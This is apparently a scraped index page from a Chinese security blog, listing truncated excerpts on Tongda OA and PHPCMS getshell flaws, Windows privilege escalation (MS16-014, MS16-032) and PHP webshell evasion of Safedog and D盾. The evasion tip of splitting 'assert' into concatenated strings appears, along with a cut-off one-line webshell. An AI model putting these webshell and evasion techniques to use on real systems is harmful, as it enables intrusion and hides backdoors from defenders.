通达OA前台getshell

通达OA前台getshell

秒杀安全狗神器

秒杀安全狗神器

PHPCMS V9最新版本后台设计缺陷导致getshell

0x01 背景

周末审计了下phpcms的最新版本,前台已经很难找到漏洞了,故看了看后台相关的代码,发现还是有一处可以拿shell的漏洞。由于默认安装后需要超级管理员权限,故该漏洞很鸡肋,但感觉应该会在其它cms中也存在,所以主要分享下挖掘思路~
PS:使用的测试环境是php5.6(已经移除gpc选项)

过D盾,安全狗,一句话

其他waf什么的自己测试

//过D盾过安全狗
 
<?php
error_reporting(0);
$b

虚拟主机提权的两个小技巧

是否大家遇到虚拟主机提权的时候,有这种情况,不管你写哪都提示的 "拒绝访问"?


原因大多数是麦咖啡的一个功能,只让特定的目录可以执行程序,比如(c:\progra~1和c:\windows\system32\)这些目录区执行程序,当然这些目录不可能让你写,其他的任何可写的目录都不会让你执行,都会是拒绝访问。


下面是个人的小技巧:


0x01: 是否大

秒杀星外提权

查找可写目录,递归无限子目录。


<img src="http://www.5kik.com/

绕过安全狗写shell和隐藏后门大马

php免杀方法

个人认为免杀大致分为这几个方面:


1.关键字拆分。

         比如assert,可以写成 'a'.'ss'.'e'.'r'.'t'这样。

MS16-014【64位可用】webshell版

今天在翻exploit-db的时候无意中看到一种新的获得ntoskrnl基地址的方法,而且32、64通用。。。

MS16-032 EPATHOBJ 0day exploit 提权工具和代码

MS16-032